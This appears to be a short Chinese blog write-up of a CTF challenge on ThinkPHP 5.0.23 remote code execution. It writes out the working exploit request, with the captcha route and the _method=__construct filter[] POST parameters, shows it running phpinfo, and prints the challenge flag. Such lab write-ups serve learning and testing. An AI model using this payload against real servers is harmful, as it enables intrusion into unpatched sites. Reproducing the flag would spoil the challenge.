[ThinkPHP]5.0.23-Rce 1

TazmiDev發表於2024-11-09

[ThinkPHP]5.0.23-Rce 1

根據題目知道這是一個5.0.23的PHP RCE,話不多說直接上掃描器

image-20241105074629529

檢測出Payload

url地址:
?s=captcha&test=-1 

Post表單引數: 
_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1

HackBar構造payload,訪問成功執行到phpinfo頁面

image-20241105075013554

ctrf+f 成功找到flag

image-20241105075051782

flag{9bf3ef01-5e80-42a0-b544-9808a1fd3bb2}